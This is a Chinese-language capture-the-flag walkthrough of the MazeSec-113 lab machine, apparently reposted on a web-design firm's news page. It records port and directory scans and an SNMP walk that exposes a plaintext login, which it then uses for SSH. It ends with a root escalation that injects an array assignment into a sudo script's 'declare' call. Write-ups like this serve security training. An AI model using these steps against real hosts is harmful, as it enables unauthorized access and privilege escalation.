ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

MazeSec-113

MazeSec-113 信息搜集端口扫描┌──(kali㉿kali)-[~]└─$ nmap-A-p-192.168.21.7 Starting Nmap7.99(https://nmap.org)at2026-10-07 05:38-0400Nmap scan reportfor192.168.21.7 Host is up(0.00065s latency). Not shown:65533closed tcp ports(reset)PORT STATE SERVICE VERSION22/tcpopensshOpenSSH8.4p1 Debian5deb11u3(protocol2.0)|ssh-hostkey:|3072f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7(RSA)|256bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d(ECDSA)|_2563b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb(ED25519)80/tcpopenhttp Apache httpd2.4.62((Debian))|_http-title: Mazesec welcome u|_http-server-header: Apache/2.4.62(Debian)MAC Address: 08:00:27:66:46:FA(Oracle VirtualBox virtual NIC)Device type: general purpose|router Running: Linux4.X|5.X, MikroTik RouterOS7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux4.15-5.19, OpenWrt21.02(Linux5.4), MikroTik RouterOS7.2-7.5(Linux5.6.3)Network Distance:1hop Service Info: OS: Linux;CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS10.65ms192.168.21.7 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.Nmap done:1IP address(1hostup)scannedin10.59seconds漏洞利用看一下80端口有什么┌──(kali㉿kali)-[~]└─$curlhttp://192.168.21.7!DOCTYPE htmlhtmllangzh-CNheadmetacharsetUTF-8metanameviewportcontentwidthdevice-width, initial-scale1.0titleMazesec welcome u/titlestylebody{margin:0;padding:0;height: 100vh;display: flex;justify-content: center;align-items: center;background-color:#f5f5f5;font-family: Arial, sans-serif;}.quote{font-size:2.5rem;text-align: center;color:#333;padding: 20px;max-width: 800px;}/style/headbodydivclassquoteThe quieter you become, themoreyou are able to hear./div/body/html目录枚举┌──(kali㉿kali)-[~]└─$ gobusterdir-uhttp://192.168.21.7-w/usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt-xhtml,php,txt,jpg,png,zip,gitGobuster v3.8.2 by OJ Reeves(TheColonial)Christian Mehlmauer(firefart)[]Url: http://192.168.21.7[]Method: GET[]Threads:10[]Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt[]Negative Status codes:404[]User Agent: gobuster/3.8.2[]Extensions: html,php,txt,jpg,png,zip,git[]Timeout: 10sStarting gobusterindirectory enumeration modeindex.html(Status:200)[Size:796]server-status(Status:403)[Size:277]logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html(Status:403)[Size:277]Progress:9482016/9482016(100.00%)Finished没发现什么能走的方向了在扫一下udp端口┌──(kali㉿kali)-[~]└─$ nmap-sU--min-rate10000192.168.21.7 Starting Nmap7.99(https://nmap.org)at2026-10-07 06:54-0400Nmap scan reportfor192.168.21.7 Host is up(0.00049s latency). Not shown:993open|filtered udp ports(no-response)PORT STATE SERVICE161/udpopensnmp MAC Address: 08:00:27:66:46:FA(Oracle VirtualBox virtual NIC)Nmap done:1IP address(1hostup)scannedin0.99seconds看一下snmp有什么https://hacktricks.wiki/network-services-pentesting/pentesting-snmp/index.html┌──(kali㉿kali)-[~]└─$ snmpbulkwalk-cpublic-v2c192.168.21.7 iso.3.6.1.2.1.25.4.2.1.4.383STRING:service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080使用账号密码尝试登陆一下┌──(kali㉿kali)-[~]└─$sshwelcome192.168.21.7 The authenticity ofhost192.168.21.7 (192.168.21.7)cant be established. ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHTYlWuYC85SbWSQ This host key is known by the following other names/addresses: ~/.ssh/known_hosts:1: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.21.7 (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html welcome192.168.21.7s password: Linux1134.19.0-27-amd64#1 SMP Debian 4.19.316-1 (2024-06-25) x86_64The programs included with the Debian GNU/Linux system arefreesoftware;the exact distribution termsforeach program are describedinthe individual filesin/usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Jan1408:32:232026from192.168.3.94 welcome113:~$iduid1000(welcome)gid1000(welcome)groups1000(welcome)权限提升welcome113:~$ls-latotal24drwxr-xr-x2welcome welcome4096Jan142026.drwxr-xr-x3root root4096Apr112025..lrwxrwxrwx1root root9Jan142026.bash_history -/dev/null -rw-r--r--1welcome welcome220Apr112025.bash_logout -rw-r--r--1welcome welcome3526Apr112025.bashrc -rw-r--r--1welcome welcome807Apr112025.profile -rw-r--r--1root root44Jan142026user.txt welcome113:~$sudo-lMatching Defaults entriesforwelcome on113: env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User welcome may run the following commands on113:(ALL)NOPASSWD: /opt/113.sh welcome113:~$cat/opt/113.sh#!/bin/bashsandbox$(mktemp-d)cd$sandboxif[$#-ne3];thenexitfiif[$3!mazesec]thenecho\$3must be mazesecexitelse/bin/cp /usr/bin/mazesec$sandboxexec_$sandbox/mazesecfi//只检查了字符串exec_。如果传入exec_[0]declare会把exec_变成数组并设置第0个元素为/bin/bash。之后$exec_等价于${exec_[0]}于是执行/bin/bash而脚本本身是通过sudo以root运行的所以得到root shellif[$1exec_];thenexitfideclare--$1$2$exec_welcome113:~$sudo/opt/113.shexec_[0]/bin/bashmazesec root113:/tmp/tmp.fLo2tSwt6k# iduid0(root)gid0(root)groups0(root)
返回列表